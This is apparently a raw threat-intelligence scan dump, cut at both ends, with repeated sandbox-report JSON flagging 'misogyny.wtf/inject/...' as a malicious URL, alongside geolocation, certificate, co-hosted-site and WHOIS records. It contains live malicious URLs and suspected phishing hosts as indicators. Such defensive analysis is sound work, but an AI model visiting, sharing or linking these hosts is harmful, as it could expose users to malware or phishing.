[%APPDATA%\\Microsoft\\Windows\\Cookies\\7XNUCQ2H.txt]- [targetUID: 00000000-00004064]\n Dropped file: "335MX9XB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\335MX9XB.txt]- [targetUID: 00000000-00004064]\n Dropped file: "36YYHGU3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36YYHGU3.txt]- [targetUID: 00000000-00004064]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_9FF521F3-7571-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6B533628-7574-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "7XNUCQ2H.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XNUCQ2H.txt]- [targetUID: 00000000-00004064]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "335MX9XB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\335MX9XB.txt]- [targetUID: 00000000-00004064]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00004064]\n "~DF8FB903D113AF51F8.TMP" has type "data"- Location: [%TEMP%\\~DF8FB903D113AF51F8.TMP]- [targetUID: 00000000-00004064]\n "36YYHGU3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36YYHGU3.txt]- [targetUID: 00000000-00004064]\n "~DF6D539535B29E264B.TMP" has type "data"- Location: [%TEMP%\\~DF6D539535B29E264B.TMP]- [targetUID: 00000000-00004064]\n "RecoveryStore._9FF521F1-7571-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "~DF0CA44B466F93387E.TMP" has type "data"- Location: [%TEMP%\\~DF0CA44B466F93387E.TMP]- [targetUID: 00000000-00004064]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://misogyny.wtf/inject/UsRjS959Rqm4sPG4"\n Pattern match: "http://misogyny.wtf"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'14/92 Antivirus vendors marked sample as malicious (15% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'14/92 Antivirus vendors marked sample as malicious (15% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'638f5c1808fc134fee52854a', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'20.226.83.185'], u'sha256': u'52243024bb50bb158cfb524a2623013b1733c9c67fee71e88d86ac5aeae8f36b', u'sha512': u'ac8062a45cb524ba2f43df875b64dd040e0bb013e30c292b2ba51c6ed020380142aeb95b0842cb0ee3bfb8b7b9ba3e7c80b45c584b6e8f34fe099a9b70e52277', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'submission_id': u'638f5c1908fc134fee52854b', u'created_at': u'2022-12-06T15:13:29+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T15:13:29+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 8, u'machine_learning_models': [], u'total_signatures': 11, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'b63910f34c83d7d38b0f574db16da648', u'network_mode': u'default', u'processes': [], u'sha1': u'a938a338ea8d3711b0243d7fac823299ef963246', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Malicious site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'misogyny.wtf'], u'extracted_files': [ misogyny.wtf 2022-12-18 00:13:55 HTTP Status Code No Web Spider 0 0 2 0 None None http://wasp.plague.fun/inject/MTJ8Vp5aynR51YMM 2022-12-18 00:12:44 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NJ', u'country_tld': u'.us', u'ip': u'2606:4700:3036::ac43:a9d7', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Newark', u'network': u'2606:4700:3030::/44', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 40.7641, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'CLOUDFLARENET', u'postal': u'07104', u'asn': u'AS13335', u'country': u'US', u'region': u'New Jersey', u'longitude': -74.1654, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 2606:4700:3036::ac43:a9d7 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 172.67.147.230 2022-12-18 00:05:12 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.226.83.185:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fe0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_fe0_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_fe0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4064"\n "IsoScope_fe0_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "IsoScope_fe0_ConnHashTable<4064>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fe0_IE_EarlyTabStart_0xd9c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "7XNUCQ2H.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XNUCQ2H.txt]- [targetUID: 00000000-00004064]\n Dropped file: "335MX9XB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\335MX9XB.txt]- [targetUID: 00000000-00004064]\n Dropped file: "36YYHGU3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36YYHGU3.txt]- [targetUID: 00000000-00004064]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_9FF521F3-7571-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6B533628-7574-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "7XNUCQ2H.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XNUCQ2H.txt]- [targetUID: 00000000-00004064]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "335MX9XB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\335MX9XB.txt]- [targetUID: 00000000-00004064]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00004064]\n "~DF8FB903D113AF51F8.TMP" has type "data"- Location: [%TEMP%\\~DF8FB903D113AF51F8.TMP]- [targetUID: 00000000-00004064]\n "36YYHGU3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36YYHGU3.txt]- [targetUID: 00000000-00004064]\n "~DF6D539535B29E264B.TMP" has type "data"- Location: [%TEMP%\\~DF6D539535B29E264B.TMP]- [targetUID: 00000000-00004064]\n "RecoveryStore._9FF521F1-7571-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "~DF0CA44B466F93387E.TMP" has type "data"- Location: [%TEMP%\\~DF0CA44B466F93387E.TMP]- [targetUID: 00000000-00004064]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://misogyny.wtf/inject/UsRjS959Rqm4sPG4"\n Pattern match: "http://misogyny.wtf"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'14/92 Antivirus vendors marked sample as malicious (15% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'14/92 Antivirus vendors marked sample as malicious (15% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'638f5c1808fc134fee52854a', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'20.226.83.185'], u'sha256': u'52243024bb50bb158cfb524a2623013b1733c9c67fee71e88d86ac5aeae8f36b', u'sha512': u'ac8062a45cb524ba2f43df875b64dd040e0bb013e30c292b2ba51c6ed020380142aeb95b0842cb0ee3bfb8b7b9ba3e7c80b45c584b6e8f34fe099a9b70e52277', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'submission_id': u'638f5c1908fc134fee52854b', u'created_at': u'2022-12-06T15:13:29+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T15:13:29+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 8, u'machine_learning_models': [], u'total_signatures': 11, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'b63910f34c83d7d38b0f574db16da648', u'network_mode': u'default', u'processes': [], u'sha1': u'a938a338ea8d3711b0243d7fac823299ef963246', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Malicious site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'misogyny.wtf'], u'extracted_files': [ 20.226.83.185 2022-12-18 00:09:52 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.20:80 188.114.96.0/24 2022-12-18 00:03:20 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-109.w90-116.abo.wanadoo.fr 90.116.166.109 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 07:55:46 (Net ID: 00:02:2D:05:BB:87) 37.780462,-122.390564 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None SoundCloud (Category: music) https://soundcloud.com/rasputain rasputain 2022-12-18 00:12:14 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.97.1', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.97.1 2022-12-18 00:03:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 48:20:40:e9:11:6c:46:fc:13:c8:c6:91:95:a6:d1:9b Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Oct 30 20:43:46 2022 GMT Not After : Jan 28 20:43:45 2023 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:ba:e1:72:b5:c9:5e:55:dd:88:0b:d7:34:57:98: e0:d5:b8:0e:28:61:25:ee:fa:ac:c2:73:87:c5:9d: fe:ef:08:f9:00:a8:f8:26:a6:f1:1b:9b:b5:8f:d9: fc:63:ed:9a:90:93:9d:52:4d:71:01:18:82:17:5b: 61:a2:75:21:9b:b2:9e:fe:5b:be:9c:5d:18:75:97: 55:08:68:f5:67:68:86:06:e9:5b:b5:42:4b:48:f6: ee:05:0b:99:62:c8:a8:74:e0:4e:70:4b:74:83:ae: 55:b3:01:a0:7f:8e:72:ee:5b:f9:74:97:45:88:f6: 76:97:a7:c2:e2:21:74:02:5d:8e:41:60:21:73:4b: 5d:c0:c1:a3:c4:58:24:34:8f:e3:34:dd:cf:c9:f0: e2:a0:47:87:d7:29:34:44:40:d1:3f:55:83:ea:dd: 67:59:7a:30:50:01:c3:b6:f3:b2:ca:05:1d:b3:eb: ae:61:b7:f4:13:94:90:a0:b6:54:d6:20:16:e5:01: e8:83:b4:2a:e6:f0:c5:cb:8a:29:3d:89:7c:49:7a: a0:90:63:f7:8f:33:f9:ce:b4:7e:df:d8:16:8b:83: 45:c0:0e:15:01:03:1e:fd:9a:7a:55:d7:64:a7:39: ba:85:2c:c2:81:0f:4c:52:92:21:81:ed:02:f8:dc: 82:6f Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 8D:8C:CC:F4:82:11:E1:FE:38:8C:7A:89:4C:FB:51:C6:26:33:92:56 X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/N5PKkvSDEsE CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/lyHNLHo1elk.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 4a:80:0e:26:2f:d2:cd:b6:d1:0d:19:c4:bb:37:bc:46:15:1b: f5:bd:91:e7:c5:9b:5c:a5:26:35:62:e8:4c:25:8f:60:2b:2c: 44:61:20:fa:5a:c5:4f:fd:a1:ea:2a:de:24:0f:90:61:cd:91: bc:7c:af:fd:e7:f9:1e:6a:94:25:f2:c6:d8:9b:a8:18:73:cc: fe:12:71:06:29:0c:f2:c7:31:03:ff:f7:32:36:a6:e0:08:c5: f3:3b:15:4b:8e:ae:1d:b7:ca:a6:39:35:ba:13:10:a0:e9:34: e0:6f:d5:23:60:1d:8b:40:ab:b5:f0:49:7a:a7:15:b6:71:84: 94:b2:73:03:ab:bd:f3:fa:07:20:05:57:e1:98:70:ac:e2:7b: 51:01:c5:43:f3:6b:00:7a:3d:d7:fe:13:99:91:be:3b:91:d7: 9d:a1:a0:39:0d:e1:df:23:d1:74:67:09:b7:3b:42:e6:a1:64: 72:4e:a8:d2:63:8d:85:39:02:cc:c6:bf:b3:0b:36:ed:73:5e: 62:ad:bb:9c:68:f4:47:1b:24:7d:0d:15:6d:18:ac:aa:b2:dd: e7:ae:2e:9b:14:6c:8f:18:20:73:76:a2:06:b8:f0:c1:fd:db: 23:37:01:db:71:02:9f:d6:2a:25:fc:03:cf:20:10:89:84:9a: f7:ac:db:e1 2022-12-18 00:09:41 Co-Hosted Site No HackerTarget 0 0 2 0 None acncnfrm.rcvry.workers.dev 172.67.147.230 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None crushingswelteringprogram.w467ujhgs3.repl.co 34.149.204.188 2022-12-18 00:41:01 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: misogyny.co Registry Domain ID: DE1B7F6E7E80840FABD3515F2E19A8DEC-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-04-14T13:53:29Z Creation Date: 2018-03-07T07:39:37Z Registry Expiry Date: 2023-03-07T07:39:37Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns2.dan.com Name Server: ns1.dan.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:41:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp The above WHOIS results have been redacted to remove potential personal data. The full WHOIS output may be available to individuals and organisations with a legitimate interest in accessing this data not outweighed by the fundamental privacy rights of the data subject. To find out more, or to make a request for access, please visit: RDDSrequest.nic.co. .CO Internet, S.A.S., the Administrator for .CO, has collected this information for the WHOIS database through Accredited Registrars. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the .CO Internet registry database. .CO Internet makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without .CO Internet's prior written permission. .CO Internet reserves the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. In some limited cases, domains that might appear as available in whois might not actually be available as they could be already registered and the whois not yet updated and/or they could be part of the Restricted list. In this cases, performing a check through your Registrar's (EPP check) will give you the actual status of the domain. Additionally, domains currently or previously used as extensions in 3rd level domains will not be available for registration in the 2nd level. For example, org.co, mil.co, edu.co, com.co, net.co, nom.co, arts.co, firm.co, info.co, int.co, web.co, rec.co, co.co. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.cointernet.co . Domain name: misogyny.co Registry Domain ID: DE1B7F6E7E80840FABD3515F2E19A8DEC-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-02-22T03:37:22.39Z Creation Date: 